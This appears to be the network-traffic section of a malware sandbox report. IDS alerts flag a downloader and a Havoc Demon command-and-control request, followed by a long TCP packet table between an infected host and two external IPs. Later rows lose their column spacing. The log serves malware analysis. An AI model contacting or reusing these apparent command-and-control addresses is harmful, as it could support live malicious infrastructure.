2024-12-19T13:35:12.823279+0100  2803274  ETPRO MALWARE Common Downloader Header Pattern UH   2         192.168.2.4  49732        89.35.237.170  80         TCP
2024-12-19T13:35:15.071412+0100  2803274  ETPRO MALWARE Common Downloader Header Pattern UH   2         192.168.2.4  49734        89.35.237.170  443        TCP
2024-12-19T13:35:19.388292+0100  2056539  ET MALWARE Havoc Demon CnC Request                  1         192.168.2.4  49735        47.84.196.148  443        TCP

Timestamp                            Source Port  Dest Port  Source IP      Dest IP
Dec 19, 2024 13:35:03.657366991 CET  49730        80         192.168.2.4    89.35.237.170
Dec 19, 2024 13:35:03.777296066 CET  80           49730      89.35.237.170  192.168.2.4
Dec 19, 2024 13:35:03.777534008 CET  49730        80         192.168.2.4    89.35.237.170
Dec 19, 2024 13:35:03.780405998 CET  49730        80         192.168.2.4    89.35.237.170
Dec 19, 2024 13:35:03.900098085 CET  80           49730      89.35.237.170  192.168.2.4
Dec 19, 2024 13:35:05.215027094 CET  80           49730      89.35.237.170  192.168.2.4
Dec 19, 2024 13:35:05.265331030 CET  49730        80         192.168.2.4    89.35.237.170
Dec 19, 2024 13:35:05.458525896 CET  80           49730      89.35.237.170  192.168.2.4
Dec 19, 2024 13:35:05.505004883 CET  49730        80         192.168.2.4    89.35.237.170
Dec 19, 2024 13:35:05.527299881 CET  49731        443        192.168.2.4    89.35.237.170
Dec 19, 2024 13:35:05.527352095 CET  443          49731      89.35.237.170  192.168.2.4
Dec 19, 2024 13:35:05.527410030 CET  49731        443        192.168.2.4    89.35.237.170
Dec 19, 2024 13:35:05.539473057 CET  49731        443        192.168.2.4    89.35.237.170
Dec 19, 2024 13:35:05.539488077 CET  443          49731      89.35.237.170  192.168.2.4
Dec 19, 2024 13:35:05.625400066 CET  80           49730      89.35.237.170  192.168.2.4
Dec 19, 2024 13:35:05.625612974 CET  49730        80         192.168.2.4    89.35.237.170
Dec 19, 2024 13:35:07.120917082 CET  443          49731      89.35.237.170  192.168.2.4
Dec 19, 2024 13:35:07.120994091 CET  49731        443        192.168.2.4    89.35.237.170
Dec 19, 2024 13:35:07.125055075 CET  49731        443        192.168.2.4    89.35.237.170
Dec 19, 2024 13:35:07.125066042 CET  443          49731      89.35.237.170  192.168.2.4
Dec 19, 2024 13:35:07.125281096 CET  443          49731      89.35.237.170  192.168.2.4
Dec 19, 2024 13:35:07.136639118 CET  49731        443        192.168.2.4    89.35.237.170
Dec 19, 2024 13:35:07.179363012 CET  443          49731      89.35.237.170  192.168.2.4
Dec 19, 2024 13:35:07.867697001 CET  443          49731      89.35.237.170  192.168.2.4
Dec 19, 2024 13:35:07.867764950 CET  443          49731      89.35.237.170  192.168.2.4
Dec 19, 2024 13:35:07.867810011 CET  49731        443        192.168.2.4    89.35.237.170
Dec 19, 2024 13:35:07.871599913 CET  49731        443        192.168.2.4    89.35.237.170
Dec 19, 2024 13:35:08.022248983 CET  49732        80         192.168.2.4    89.35.237.170
Dec 19, 2024 13:35:08.142581940 CET  80           49732      89.35.237.170  192.168.2.4
Dec 19, 2024 13:35:08.142703056 CET  49732        80         192.168.2.4    89.35.237.170
Dec 19, 2024 13:35:08.143022060 CET  49732        80         192.168.2.4    89.35.237.170
Dec 19, 2024 13:35:08.263050079 CET  80           49732      89.35.237.170  192.168.2.4
Dec 19, 2024 13:35:09.560062885 CET  80           49732      89.35.237.170  192.168.2.4
Dec 19, 2024 13:35:09.561482906 CET  49733        443        192.168.2.4    89.35.237.170
Dec 19, 2024 13:35:09.561577082 CET  443          49733      89.35.237.170  192.168.2.4
Dec 19, 2024 13:35:09.561922073 CET  49733        443        192.168.2.4    89.35.237.170
Dec 19, 2024 13:35:09.561923027 CET  49733        443        192.168.2.4    89.35.237.170
Dec 19, 2024 13:35:09.562040091 CET  443          49733      89.35.237.170  192.168.2.4
Dec 19, 2024 13:35:09.604537010 CET  49732        80         192.168.2.4    89.35.237.170
Dec 19, 2024 13:35:11.101216078 CET  443          49733      89.35.237.170  192.168.2.4
Dec 19, 2024 13:35:11.102871895 CET  49733        443        192.168.2.4    89.35.237.170
Dec 19, 2024 13:35:11.102965117 CET  443          49733      89.35.237.170  192.168.2.4
Dec 19, 2024 13:35:11.835752010 CET  443          49733      89.35.237.170  192.168.2.4
Dec 19, 2024 13:35:11.885869980 CET  49733        443        192.168.2.4    89.35.237.170
Dec 19, 2024 13:35:11.935689926 CET  443          49733      89.35.237.170  192.168.2.4
Dec 19, 2024 13:35:11.935704947 CET  443          49733      89.35.237.170  192.168.2.4
Dec 19, 2024 13:35:11.935786963 CET  443          49733      89.35.237.170  192.168.2.4
Dec 19, 2024 13:35:11.935798883 CET  443          49733      89.35.237.170  192.168.2.4
Dec 19, 2024 13:35:11.935815096 CET  443          49733      89.35.237.170  192.168.2.4
Dec 19, 2024 13:35:11.935890913 CET  49733        443        192.168.2.4    89.35.237.170
Dec 19, 2024 13:35:11.935890913 CET  49733        443        192.168.2.4    89.35.237.170
Dec 19, 2024 13:35:11.935890913 CET  49733        443        192.168.2.4    89.35.237.170
Dec 19, 2024 13:35:11.935964108 CET  443          49733      89.35.237.170  192.168.2.4
Dec 19, 2024 13:35:11.979584932 CET  49733        443        192.168.2.4    89.35.237.170
Dec 19, 2024 13:35:12.062341928 CET  443          49733      89.35.237.170  192.168.2.4
Dec 19, 2024 13:35:12.062356949 CET  443          49733      89.35.237.170  192.168.2.4
Dec 19, 2024 13:35:12.062410116 CET  443          49733      89.35.237.170  192.168.2.4
Dec 19, 2024 13:35:12.062443018 CET  443          49733      89.35.237.170  192.168.2.4
Dec 19, 2024 13:35:12.062551975 CET  49733        443        192.168.2.4    89.35.237.170
Dec 19, 2024 13:35:12.062552929 CET  49733        443        192.168.2.4    89.35.237.170
Dec 19, 2024 13:35:12.062623978 CET  443          49733      89.35.237.170  192.168.2.4
Dec 19, 2024 13:35:12.062690020 CET  49733        443        192.168.2.4    89.35.237.170
Dec 19, 2024 13:35:12.103714943 CET  443          49733      89.35.237.170  192.168.2.4
Dec 19, 2024 13:35:12.103775024 CET  443          49733      89.35.237.170  192.168.2.4
Dec 19, 2024 13:35:12.103820086 CET  49733        443        192.168.2.4    89.35.237.170
Dec 19, 2024 13:35:12.103853941 CET  443          49733      89.35.237.170  192.168.2.4
Dec 19, 2024 13:35:12.103882074 CET  49733        443        192.168.2.4    89.35.237.170
Dec 19, 2024 13:35:12.103902102 CET  49733        443        192.168.2.4    89.35.237.170
Dec 19, 2024 13:35:12.220227003 CET  443          49733      89.35.237.170  192.168.2.4
Dec 19, 2024 13:35:12.220257998 CET  443          49733      89.35.237.170  192.168.2.4
Dec 19, 2024 13:35:12.220369101 CET  49733        443        192.168.2.4    89.35.237.170
Dec 19, 2024 13:35:12.220433950 CET  443          49733      89.35.237.170  192.168.2.4
Dec 19, 2024 13:35:12.220503092 CET  49733        443        192.168.2.4    89.35.237.170
Dec 19, 2024 13:35:12.246645927 CET  443          49733      89.35.237.170  192.168.2.4
Dec 19, 2024 13:35:12.246663094 CET  443          49733      89.35.237.170  192.168.2.4
Dec 19, 2024 13:35:12.246884108 CET  49733        443        192.168.2.4    89.35.237.170
Dec 19, 2024 13:35:12.246885061 CET  49733        443        192.168.2.4    89.35.237.170
Dec 19, 2024 13:35:12.246953964 CET  443          49733      89.35.237.170  192.168.2.4
Dec 19, 2024 13:35:12.247040987 CET  49733        443        192.168.2.4    89.35.237.170
Dec 19, 2024 13:35:12.268651009 CET  443          49733      89.35.237.170  192.168.2.4
Dec 19, 2024 13:35:12.268680096 CET  443          49733      89.35.237.170  192.168.2.4
Dec 19, 2024 13:35:12.268727064 CET  49733        443        192.168.2.4    89.35.237.170
Dec 19, 2024 13:35:12.268745899 CET  443          49733      89.35.237.170  192.168.2.4
Dec 19, 2024 13:35:12.268764973 CET  49733        443        192.168.2.4    89.35.237.170
Dec 19, 2024 13:35:12.268790960 CET  49733        443        192.168.2.4    89.35.237.170
Dec 19, 2024 13:35:12.273652077 CET  443          49733      89.35.237.170  192.168.2.4
Dec 19, 2024 13:35:12.273736000 CET  443          49733      89.35.237.170  192.168.2.4
Dec 19, 2024 13:35:12.273825884 CET  49733        443        192.168.2.4    89.35.237.170
Dec 19, 2024 13:35:12.273825884 CET  49733        443        192.168.2.4    89.35.237.170
Dec 19, 2024 13:35:12.280666113 CET  49733        443        192.168.2.4    89.35.237.170
Dec 19, 2024 13:35:12.302375078 CET  49732        80         192.168.2.4    89.35.237.170
Dec 19, 2024 13:35:12.423202991 CET  80           49732      89.35.237.170  192.168.2.4
Dec 19, 2024 13:35:12.781531096 CET  80           49732      89.35.237.170  192.168.2.4
Dec 19, 2024 13:35:12.782068968 CET  49734        443        192.168.2.4    89.35.237.170
Dec 19, 2024 13:35:12.782115936 CET  443          49734      89.35.237.170  192.168.2.4
Dec 19, 2024 13:35:12.782176971 CET  49734        443        192.168.2.4    89.35.237.170
Dec 19, 2024 13:35:12.782510042 CET  49734        443        192.168.2.4    89.35.237.170
Dec 19, 2024 13:35:12.782517910 CET  443          49734      89.35.237.170  192.168.2.4
Dec 19, 2024 13:35:12.823278904 CET  49732        80         192.168.2.4    89.35.237.170
Dec 19, 2024 13:35:14.326200962 CET  443          49734      89.35.237.170  192.168.2.4
Dec 19, 2024 13:35:14.327796936 CET  49734        443        192.168.2.4    89.35.237.170
Dec 19, 2024 13:35:14.327815056 CET  443          49734      89.35.237.170  192.168.2.4
Dec 19, 2024 13:35:15.071424961 CET  443          49734      89.35.237.170  192.168.2.4
Dec 19, 2024 13:35:15.120187998 CET  49734        443        192.168.2.4    89.35.237.170
Dec 19, 2024 13:35:15.191158056 CET  443          49734      89.35.237.170  192.168.2.4
Dec 19, 2024 13:35:15.191174984 CET  443          49734      89.35.237.170  192.168.2.4
Dec 19, 2024 13:35:15.191246033 CET  443          49734      89.35.237.170  192.168.2.4
Dec 19, 2024 13:35:15.191282988 CET  443          49734      89.35.237.170  192.168.2.4
Dec 19, 2024 13:35:15.191302061 CET  49734        443        192.168.2.4    89.35.237.170
Dec 19, 2024 13:35:15.191329956 CET  443          49734      89.35.237.170  192.168.2.4
Dec 19, 2024 13:35:15.191354036 CET  49734        443        192.168.2.4    89.35.237.170
Dec 19, 2024 13:35:15.191376925 CET  49734        443        192.168.2.4    89.35.237.170
Dec 19, 2024 13:35:15.302622080 CET  443          49734      89.35.237.170  192.168.2.4
Dec 19, 2024 13:35:15.302651882 CET  443          49734      89.35.237.170  192.168.2.4
Dec 19, 2024 13:35:15.302784920 CET  49734        443        192.168.2.4    89.35.237.170
Dec 19, 2024 13:35:15.302803040 CET  443          49734      89.35.237.170  192.168.2.4
Dec 19, 2024 13:35:15.302856922 CET  49734        443        192.168.2.4    89.35.237.170
Dec 19, 2024 13:35:15.345133066 CET  443          49734      89.35.237.170  192.168.2.4
Dec 19, 2024 13:35:15.345159054 CET  443          49734      89.35.237.170  192.168.2.4
Dec 19, 2024 13:35:15.345210075 CET  49734        443        192.168.2.4    89.35.237.170
Dec 19, 2024 13:35:15.345221043 CET  443          49734      89.35.237.170  192.168.2.4
Dec 19, 2024 13:35:15.345252991 CET  49734        443        192.168.2.4    89.35.237.170
Dec 19, 2024 13:35:15.345561028 CET  49734        443        192.168.2.4    89.35.237.170
Dec 19, 2024 13:35:15.455092907 CET  443          49734      89.35.237.170  192.168.2.4
Dec 19, 2024 13:35:15.455215931 CET  49734        443        192.168.2.4    89.35.237.170
Dec 19, 2024 13:35:15.455240011 CET  443          49734      89.35.237.170  192.168.2.4
Dec 19, 2024 13:35:15.455292940 CET  443          49734      89.35.237.170  192.168.2.4
Dec 19, 2024 13:35:15.455333948 CET  49734        443        192.168.2.4    89.35.237.170
Dec 19, 2024 13:35:15.455370903 CET  49734        443        192.168.2.4    89.35.237.170
Dec 19, 2024 13:35:15.484155893 CET  443          49734      89.35.237.170  192.168.2.4
Dec 19, 2024 13:35:15.484216928 CET  443          49734      89.35.237.170  192.168.2.4
Dec 19, 2024 13:35:15.484250069 CET  49734        443        192.168.2.4    89.35.237.170
Dec 19, 2024 13:35:15.484266043 CET  443          49734      89.35.237.170  192.168.2.4
Dec 19, 2024 13:35:15.484308004 CET  49734        443        192.168.2.4    89.35.237.170
Dec 19, 2024 13:35:15.513851881 CET  443          49734      89.35.237.170  192.168.2.4
Dec 19, 2024 13:35:15.513909101 CET  443          49734      89.35.237.170  192.168.2.4
Dec 19, 2024 13:35:15.513951063 CET  49734        443        192.168.2.4    89.35.237.170
Dec 19, 2024 13:35:15.513962030 CET  443          49734      89.35.237.170  192.168.2.4
Dec 19, 2024 13:35:15.513989925 CET  49734        443        192.168.2.4    89.35.237.170
Dec 19, 2024 13:35:15.514023066 CET  49734        443        192.168.2.4    89.35.237.170
Dec 19, 2024 13:35:15.575057030 CET  443          49734      89.35.237.170  192.168.2.4
Dec 19, 2024 13:35:15.575083971 CET  443          49734      89.35.237.170  192.168.2.4
Dec 19, 2024 13:35:15.575196028 CET  49734        443        192.168.2.4    89.35.237.170
Dec 19, 2024 13:35:15.575206995 CET  443          49734      89.35.237.170  192.168.2.4
Dec 19, 2024 13:35:15.575253963 CET  49734        443        192.168.2.4    89.35.237.170
Dec 19, 2024 13:35:15.588059902 CET  443          49734      89.35.237.170  192.168.2.4
Dec 19, 2024 13:35:15.588080883 CET  443          49734      89.35.237.170  192.168.2.4
Dec 19, 2024 13:35:15.588232994 CET  49734        443        192.168.2.4    89.35.237.170
Dec 19, 2024 13:35:15.588241100 CET  443          49734      89.35.237.170  192.168.2.4
Dec 19, 2024 13:35:15.588303089 CET  49734        443        192.168.2.4    89.35.237.170
Dec 19, 2024 13:35:15.658164024 CET  443          49734      89.35.237.170  192.168.2.4
Dec 19, 2024 13:35:15.658190966 CET  443          49734      89.35.237.170  192.168.2.4
Dec 19, 2024 13:35:15.658273935 CET  49734        443        192.168.2.4    89.35.237.170
Dec 19, 2024 13:35:15.658288002 CET  443          49734      89.35.237.170  192.168.2.4
Dec 19, 2024 13:35:15.658339024 CET  49734        443        192.168.2.4    89.35.237.170
Dec 19, 2024 13:35:15.674444914 CET  443          49734      89.35.237.170  192.168.2.4
Dec 19, 2024 13:35:15.674468040 CET  443          49734      89.35.237.170  192.168.2.4
Dec 19, 2024 13:35:15.674546957 CET  49734        443        192.168.2.4    89.35.237.170
Dec 19, 2024 13:35:15.674557924 CET  443          49734      89.35.237.170  192.168.2.4
Dec 19, 2024 13:35:15.674612999 CET  49734        443        192.168.2.4    89.35.237.170
Dec 19, 2024 13:35:15.690685034 CET  443          49734      89.35.237.170  192.168.2.4
Dec 19, 2024 13:35:15.690715075 CET  443          49734      89.35.237.170  192.168.2.4
Dec 19, 2024 13:35:15.690768957 CET  49734        443        192.168.2.4    89.35.237.170
Dec 19, 2024 13:35:15.690777063 CET  443          49734      89.35.237.170  192.168.2.4
Dec 19, 2024 13:35:15.690819979 CET  49734        443        192.168.2.4    89.35.237.170
Dec 19, 2024 13:35:15.705557108 CET  443          49734      89.35.237.170  192.168.2.4
Dec 19, 2024 13:35:15.705583096 CET  443          49734      89.35.237.170  192.168.2.4
Dec 19, 2024 13:35:15.705688000 CET  49734        443        192.168.2.4    89.35.237.170
Dec 19, 2024 13:35:15.705705881 CET  443          49734      89.35.237.170  192.168.2.4
Dec 19, 2024 13:35:15.705759048 CET  49734        443        192.168.2.4    89.35.237.170
Dec 19, 2024 13:35:15.716185093 CET  443          49734      89.35.237.170  192.168.2.4
Dec 19, 2024 13:35:15.716204882 CET  443          49734      89.35.237.170  192.168.2.4
Dec 19, 2024 13:35:15.716298103 CET  49734        443        192.168.2.4    89.35.237.170
Dec 19, 2024 13:35:15.716305971 CET  443          49734      89.35.237.170  192.168.2.4
Dec 19, 2024 13:35:15.716355085 CET  49734        443        192.168.2.4    89.35.237.170
Dec 19, 2024 13:35:15.728087902 CET  443          49734      89.35.237.170  192.168.2.4
Dec 19, 2024 13:35:15.728106022 CET  443          49734      89.35.237.170  192.168.2.4
Dec 19, 2024 13:35:15.728208065 CET  49734        443        192.168.2.4    89.35.237.170
Dec 19, 2024 13:35:15.728214025 CET  443          49734      89.35.237.170  192.168.2.4
Dec 19, 2024 13:35:15.728259087 CET  49734        443        192.168.2.4    89.35.237.170
Dec 19, 2024 13:35:15.746392965 CET  443          49734      89.35.237.170  192.168.2.4
Dec 19, 2024 13:35:15.746413946 CET  443          49734      89.35.237.170  192.168.2.4
Dec 19, 2024 13:35:15.746506929 CET  49734        443        192.168.2.4    89.35.237.170
Dec 19, 2024 13:35:15.746511936 CET  443          49734      89.35.237.170  192.168.2.4
Dec 19, 2024 13:35:15.746553898 CET  49734        443        192.168.2.4    89.35.237.170
Dec 19, 2024 13:35:15.766983032 CET  443          49734      89.35.237.170  192.168.2.4
Dec 19, 2024 13:35:15.767004967 CET  443          49734      89.35.237.170  192.168.2.4
Dec 19, 2024 13:35:15.767096996 CET  49734        443        192.168.2.4    89.35.237.170
Dec 19, 2024 13:35:15.767103910 CET  443          49734      89.35.237.170  192.168.2.4
Dec 19, 2024 13:35:15.767153025 CET  49734        443        192.168.2.4    89.35.237.170
Dec 19, 2024 13:35:15.842694998 CET  443          49734      89.35.237.170  192.168.2.4
Dec 19, 2024 13:35:15.842720032 CET  443          49734      89.35.237.170  192.168.2.4
Dec 19, 2024 13:35:15.842835903 CET  49734        443        192.168.2.4    89.35.237.170
Dec 19, 2024 13:35:15.842845917 CET  443          49734      89.35.237.170  192.168.2.4
Dec 19, 2024 13:35:15.842899084 CET  49734        443        192.168.2.4    89.35.237.170
Dec 19, 2024 13:35:15.852550030 CET  443          49734      89.35.237.170  192.168.2.4
Dec 19, 2024 13:35:15.852566957 CET  443          49734      89.35.237.170  192.168.2.4
Dec 19, 2024 13:35:15.852652073 CET  49734        443        192.168.2.4    89.35.237.170
Dec 19, 2024 13:35:15.852658987 CET  443          49734      89.35.237.170  192.168.2.4
Dec 19, 2024 13:35:15.852710009 CET  49734        443        192.168.2.4    89.35.237.170
Dec 19, 2024 13:35:15.861294031 CET  443          49734      89.35.237.170  192.168.2.4
Dec 19, 2024 13:35:15.861313105 CET  443          49734      89.35.237.170  192.168.2.4
Dec 19, 2024 13:35:15.861397028 CET  49734        443        192.168.2.4    89.35.237.170
Dec 19, 2024 13:35:15.861403942 CET  443          49734      89.35.237.170  192.168.2.4
Dec 19, 2024 13:35:15.861453056 CET  49734        443        192.168.2.4    89.35.237.170
Dec 19, 2024 13:35:15.870942116 CET  443          49734      89.35.237.170  192.168.2.4
Dec 19, 2024 13:35:15.870959997 CET  443          49734      89.35.237.170  192.168.2.4
Dec 19, 2024 13:35:15.871026039 CET  49734        443        192.168.2.4    89.35.237.170
Dec 19, 2024 13:35:15.871032000 CET  443          49734      89.35.237.170  192.168.2.4
Dec 19, 2024 13:35:15.871081114 CET  49734        443        192.168.2.4    89.35.237.170
Dec 19, 2024 13:35:15.880764961 CET  443          49734      89.35.237.170  192.168.2.4
Dec 19, 2024 13:35:15.880784035 CET  443          49734      89.35.237.170  192.168.2.4
Dec 19, 2024 13:35:15.880852938 CET  49734        443        192.168.2.4    89.35.237.170
Dec 19, 2024 13:35:15.880856991 CET  443          49734      89.35.237.170  192.168.2.4
Dec 19, 2024 13:35:15.880903006 CET  49734        443        192.168.2.4    89.35.237.170
Dec 19, 2024 13:35:15.905740976 CET  443          49734      89.35.237.170  192.168.2.4
Dec 19, 2024 13:35:15.905760050 CET  443          49734      89.35.237.170  192.168.2.4
Dec 19, 2024 13:35:15.905843973 CET  49734        443        192.168.2.4    89.35.237.170
Dec 19, 2024 13:35:15.905849934 CET  443          49734      89.35.237.170  192.168.2.4
Dec 19, 2024 13:35:15.905900955 CET  49734        443        192.168.2.4    89.35.237.170
Dec 19, 2024 13:35:15.917743921 CET  443          49734      89.35.237.170  192.168.2.4
Dec 19, 2024 13:35:15.917809963 CET  443          49734      89.35.237.170  192.168.2.4
Dec 19, 2024 13:35:15.917818069 CET  49734        443        192.168.2.4    89.35.237.170
Dec 19, 2024 13:35:15.917834997 CET  443          49734      89.35.237.170  192.168.2.4
Dec 19, 2024 13:35:15.917866945 CET  49734        443        192.168.2.4    89.35.237.170
Dec 19, 2024 13:35:15.917890072 CET  443          49734      89.35.237.170  192.168.2.4
Dec 19, 2024 13:35:15.917936087 CET  49734        443        192.168.2.4    89.35.237.170
Dec 19, 2024 13:35:15.947386980 CET  49734        443        192.168.2.4    89.35.237.170
Dec 19, 2024 13:35:16.539815903 CET  49732        80         192.168.2.4    89.35.237.170
Dec 19, 2024 13:35:16.873634100 CET  49735        443        192.168.2.4    47.84.196.148
Dec 19, 2024 13:35:16.873691082 CET  443          49735      47.84.196.148  192.168.2.4
Dec 19, 2024 13:35:16.873758078 CET  49735        443        192.168.2.4    47.84.196.148
Dec 19, 2024 13:35:16.874730110 CET  49735        443        192.168.2.4    47.84.196.148
Dec 19, 2024 13:35:16.874746084 CET  443          49735      47.84.196.148  192.168.2.4
Dec 19, 2024 13:35:18.565167904 CET  443          49735      47.84.196.148  192.168.2.4
Dec 19, 2024 13:35:18.565234900 CET  49735        443        192.168.2.4    47.84.196.148
Dec 19, 2024 13:35:18.568290949 CET  49735        443        192.168.2.4    47.84.196.148
Dec 19, 2024 13:35:18.568305969 CET  443          49735      47.84.196.148  192.168.2.4
Dec 19, 2024 13:35:18.568546057 CET  443          49735      47.84.196.148  192.168.2.4
Dec 19, 2024 13:35:18.614358902 CET  49735        443        192.168.2.4    47.84.196.148
Dec 19, 2024 13:35:18.614382029 CET  49735        443        192.168.2.4    47.84.196.148
Dec 19, 2024 13:35:18.614447117 CET  443          49735      47.84.196.148  192.168.2.4
Dec 19, 2024 13:35:19.388315916 CET  443          49735      47.84.196.148  192.168.2.4
Dec 19, 2024 13:35:19.388405085 CET  443          49735      47.84.196.148  192.168.2.4
Dec 19, 2024 13:35:19.388504982 CET  49735        443        192.168.2.4    47.84.196.148
Dec 19, 2024 13:35:19.396454096 CET  49735        443        192.168.2.4    47.84.196.148
Dec 19, 2024 13:35:19.396492958 CET  443          49735      47.84.196.148  192.168.2.4
Dec 19, 2024 13:35:19.396511078 CET  49735        443        192.168.2.4    47.84.196.148
Dec 19, 2024 13:35:19.396521091 CET  443          49735      47.84.196.148  192.168.2.4
Dec 19, 2024 13:35:44.777993917 CET  49742        443        192.168.2.4    47.84.196.148
Dec 19, 2024 13:35:44.778090000 CET  443          49742      47.84.196.148  192.168.2.4
Dec 19, 2024 13:35:44.778364897 CET  49742        443        192.168.2.4    47.84.196.148
Dec 19, 2024 13:35:44.778505087 CET  49742        443        192.168.2.4    47.84.196.148
Dec 19, 2024 13:35:44.778539896 CET  443          49742      47.84.196.148  192.168.2.4
Dec 19, 2024 13:35:46.460684061 CET  443          49742      47.84.196.148  192.168.2.4
Dec 19, 2024 13:35:46.461580038 CET  49742        443        192.168.2.4    47.84.196.148
Dec 19, 2024 13:35:46.461626053 CET  443          49742      47.84.196.148  192.168.2.4
Dec 19, 2024 13:35:46.473278046 CET  49742        443        192.168.2.4    47.84.196.148
Dec 19, 2024 13:35:46.473278999 CET  49742        443        192.168.2.4    47.84.196.148
Dec 19, 2024 13:35:46.473332882 CET  443          49742      47.84.196.148  192.168.2.4
Dec 19, 2024 13:35:46.473386049 CET  443          49742      47.84.196.148  192.168.2.4
Dec 19, 2024 13:35:47.366189003 CET  443          49742      47.84.196.148  192.168.2.4
Dec 19, 2024 13:35:47.366266012 CET  443          49742      47.84.196.148  192.168.2.4
Dec 19, 2024 13:35:47.366452932 CET  49742        443        192.168.2.4    47.84.196.148
Dec 19, 2024 13:35:47.366548061 CET  49742        443        192.168.2.4    47.84.196.148
Dec 19, 2024 13:35:47.366548061 CET  49742        443        192.168.2.4    47.84.196.148
Dec 19, 2024 13:35:47.366592884 CET  443          49742      47.84.196.148  192.168.2.4
Dec 19, 2024 13:35:47.366626024 CET  443          49742      47.84.196.148  192.168.2.4
Dec 19, 2024 13:36:17.075251102 CET  49785        443        192.168.2.4    47.84.196.148
Dec 19, 2024 13:36:17.075303078 CET  443          49785      47.84.196.148  192.168.2.4
Dec 19, 2024 13:36:17.075381041 CET  49785        443        192.168.2.4    47.84.196.148
Dec 19, 2024 13:36:17.075790882 CET  49785        443        192.168.2.4    47.84.196.148
Dec 19, 2024 13:36:17.075809956 CET  443          49785      47.84.196.148  192.168.2.4
Dec 19, 2024 13:36:18.759804964 CET  443          49785      47.84.196.148  192.168.2.4
Dec 19, 2024 13:36:18.760577917 CET  49785        443        192.168.2.4    47.84.196.148
                                                  Dec 19, 2024 13:36:18.760622025 CET4434978547.84.196.148192.168.2.4
                                                  Dec 19, 2024 13:36:18.761018991 CET49785443192.168.2.447.84.196.148
                                                  Dec 19, 2024 13:36:18.761046886 CET4434978547.84.196.148192.168.2.4
                                                  Dec 19, 2024 13:36:18.768115044 CET49785443192.168.2.447.84.196.148
                                                  Dec 19, 2024 13:36:18.768141985 CET4434978547.84.196.148192.168.2.4
                                                  Dec 19, 2024 13:36:19.650799990 CET4434978547.84.196.148192.168.2.4
                                                  Dec 19, 2024 13:36:19.650964022 CET4434978547.84.196.148192.168.2.4
                                                  Dec 19, 2024 13:36:19.651020050 CET49785443192.168.2.447.84.196.148
                                                  Dec 19, 2024 13:36:19.651215076 CET49785443192.168.2.447.84.196.148
                                                  Dec 19, 2024 13:36:19.651237965 CET4434978547.84.196.148192.168.2.4
                                                  Dec 19, 2024 13:36:19.651254892 CET49785443192.168.2.447.84.196.148
                                                  Dec 19, 2024 13:36:19.651261091 CET4434978547.84.196.148192.168.2.4
                                                  Dec 19, 2024 13:36:52.091734886 CET49864443192.168.2.447.84.196.148
                                                  Dec 19, 2024 13:36:52.091768980 CET4434986447.84.196.148192.168.2.4
                                                  Dec 19, 2024 13:36:52.091922045 CET49864443192.168.2.447.84.196.148
                                                  Dec 19, 2024 13:36:52.095679998 CET49864443192.168.2.447.84.196.148
                                                  Dec 19, 2024 13:36:52.095700979 CET4434986447.84.196.148192.168.2.4
                                                  Dec 19, 2024 13:36:53.797230005 CET4434986447.84.196.148192.168.2.4
                                                  Dec 19, 2024 13:36:53.797482014 CET49864443192.168.2.447.84.196.148
                                                  Dec 19, 2024 13:36:53.798691988 CET49864443192.168.2.447.84.196.148
                                                  Dec 19, 2024 13:36:53.798707962 CET4434986447.84.196.148192.168.2.4
                                                  Dec 19, 2024 13:36:53.799518108 CET4434986447.84.196.148192.168.2.4
                                                  Dec 19, 2024 13:36:53.828728914 CET49864443192.168.2.447.84.196.148
                                                  Dec 19, 2024 13:36:53.828891039 CET49864443192.168.2.447.84.196.148
                                                  Dec 19, 2024 13:36:53.828948975 CET4434986447.84.196.148192.168.2.4
                                                  Dec 19, 2024 13:36:54.694466114 CET4434986447.84.196.148192.168.2.4
                                                  Dec 19, 2024 13:36:54.694565058 CET4434986447.84.196.148192.168.2.4
                                                  Dec 19, 2024 13:36:54.694617033 CET49864443192.168.2.447.84.196.148
                                                  Dec 19, 2024 13:36:54.694987059 CET49864443192.168.2.447.84.196.148
                                                  Dec 19, 2024 13:36:54.694987059 CET49864443192.168.2.447.84.196.148
                                                  Dec 19, 2024 13:36:54.695004940 CET4434986447.84.196.148192.168.2.4
                                                  Dec 19, 2024 13:36:54.695013046 CET4434986447.84.196.148192.168.2.4
                                                  Dec 19, 2024 13:37:19.830184937 CET49927443192.168.2.447.84.196.148
                                                  Dec 19, 2024 13:37:19.830224991 CET4434992747.84.196.148192.168.2.4
                                                  Dec 19, 2024 13:37:19.830614090 CET49927443192.168.2.447.84.196.148
                                                  Dec 19, 2024 13:37:19.833880901 CET49927443192.168.2.447.84.196.148
                                                  Dec 19, 2024 13:37:19.833904028 CET4434992747.84.196.148192.168.2.4
                                                  Dec 19, 2024 13:37:21.520015001 CET4434992747.84.196.148192.168.2.4
                                                  Dec 19, 2024 13:37:21.520144939 CET49927443192.168.2.447.84.196.148
                                                  Dec 19, 2024 13:37:21.521763086 CET49927443192.168.2.447.84.196.148
                                                  Dec 19, 2024 13:37:21.521770954 CET4434992747.84.196.148192.168.2.4
                                                  Dec 19, 2024 13:37:21.522357941 CET4434992747.84.196.148192.168.2.4
                                                  Dec 19, 2024 13:37:21.556420088 CET49927443192.168.2.447.84.196.148
                                                  Dec 19, 2024 13:37:21.556581020 CET49927443192.168.2.447.84.196.148
                                                  Dec 19, 2024 13:37:21.556643009 CET4434992747.84.196.148192.168.2.4
                                                  Dec 19, 2024 13:37:22.410813093 CET4434992747.84.196.148192.168.2.4
                                                  Dec 19, 2024 13:37:22.410919905 CET4434992747.84.196.148192.168.2.4
                                                  Dec 19, 2024 13:37:22.411001921 CET49927443192.168.2.447.84.196.148
                                                  Dec 19, 2024 13:37:22.411108017 CET49927443192.168.2.447.84.196.148
                                                  Dec 19, 2024 13:37:22.411108017 CET49927443192.168.2.447.84.196.148
                                                  Dec 19, 2024 13:37:22.411129951 CET4434992747.84.196.148192.168.2.4
                                                  Dec 19, 2024 13:37:22.411142111 CET4434992747.84.196.148192.168.2.4
                                                  Dec 19, 2024 13:37:44.968177080 CET49985443192.168.2.447.84.196.148
                                                  Dec 19, 2024 13:37:44.968225956 CET4434998547.84.196.148192.168.2.4
                                                  Dec 19, 2024 13:37:44.968321085 CET49985443192.168.2.447.84.196.148
                                                  Dec 19, 2024 13:37:44.968856096 CET49985443192.168.2.447.84.196.148
                                                  Dec 19, 2024 13:37:44.968873024 CET4434998547.84.196.148192.168.2.4
                                                  Dec 19, 2024 13:37:46.650933981 CET4434998547.84.196.148192.168.2.4
                                                  Dec 19, 2024 13:37:46.651021957 CET49985443192.168.2.447.84.196.148
                                                  Dec 19, 2024 13:37:46.653049946 CET49985443192.168.2.447.84.196.148
